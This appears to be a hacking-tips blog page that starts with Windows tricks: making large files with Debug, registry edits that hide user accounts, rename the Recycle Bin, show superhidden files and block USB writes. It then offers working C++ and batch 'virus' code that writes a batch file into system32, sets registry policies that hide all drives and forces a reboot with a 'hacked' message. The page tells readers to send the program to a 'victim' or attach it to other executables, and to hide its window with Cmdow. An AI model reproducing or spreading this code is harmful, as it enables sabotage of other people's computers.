How to create a Big size file ?

You can create a big size file using windows default command prompt itself.  Why we need huge size file? When you create virus  or you can use in your college for occupying the memory.

First of all Decide the Size of  huge file.  For eg, if you decide 1 milliion byte,then we should convert it to Hexadecimal format.  Use the Windows Calculator in Scientific mode to convert to Hexadecimal.

we are planned to create 1 million byte sized file.  So,Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.) Pad the result with zeroes at the left until the file size reaches eight digits 000F4240.

  • Now goto start->run
  • Enter "cmd" to open the window.
  •  Enter the command DEBUG BIGFILE.DAT and ignore the File not found message
  •  Type RCX and press Enter. 
  • Debug will display a colon prompt.
  • Enter the last four digits of the hexadecimal number you calculated (4240, in our example). 
  •  Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in our example). 
  • Enter W for Write and Q for Quit.
  • You've just created a 1-million-byte file using Debug. 
  • Of course you can create a file of any desired size using the same technique.

How to Hide the Accounts in Windows system?

You may want to hide the admin or some other accounts for privacy purpose. If you are having public cafe or organization or school ,then you probably need.  I am going to guide you in this article to hide the Acccounts in Windows system.


  • Now go to start->run
  • Enter as "regedit" to open the registry window.
  • Navigate to this Path:
    HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList
  • In the Right pane, Right click -> New -> String Value
  • Right click on the new String Value and click Rename
  • Enter the Name of the Account you want to hide.
  • Right click on the String Value  and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.
  • Now Save and Exit the Registry  Edit.
Restart the system.
When you login if you want to access the hidden account,then just press
"ctrl+alt+del" in login page.
Enter your hidden account and password.

How to Change or Rename the Recycle bin in windows?

Go to start->run
type as regedit
and hit enter
Registry edit will open.

Navigate to this Path by clicking the plus symbol:


HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
You can see as Recycle bin in right panel.
Change it as your wish.

How to show SuperHidden files in xp and vista?

Some files will be hidden from Users. If you want to see those files,you have to edit the registry. This hack will fit for both windows xp and Vista.

Go to Start-<run
Enter as Regedit
Navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
In the right panel ,you can see the superhidden registry
Right click on the SuperHidden
Change the Data value to 1.
Click ok
Exit the registry and restart the windows.


How to disable writing to USB?

If you are the administrator of public cafe or school,this trick will be helpful for giving protection to your system.  You can disable writing to USB.  This will prevent from file stealing.  You have to login to administrator so that you can access regedit.

Go to start .  Select run.

Type as regedit and hit enter
Now navigate to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies
 In right panel you can find writeprotect and
Change the value to 00000001


That's all now no  one can transfer data to USB.  Now your system is protected.

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.

C++ Virus Code :


#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }


Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.


Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim

How to hide the windows while running the virus code?

This day will be great day!  Because The Brain Hackers get top rank in blogger directories. 

Now i am going to introduce a new tool called as "CMDOW" .   When you create and send virus to victim, the virus running process may be shown to victims.  This tool will hide that also.

About Cmdow
Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more.

Cmdow is 31kb standalone executable. It does not create any temporary files, nor does it write to the registry. There is no installation procedure, just run it. To completely remove all traces of it from your system, delete it.

Cmdow was written with batch file programmers in mind. Particular attention has been paid to Cmdows output making it easy to process with the 'FOR /F' command found in NT4/2000/XP/2003.


For more details and Download from here: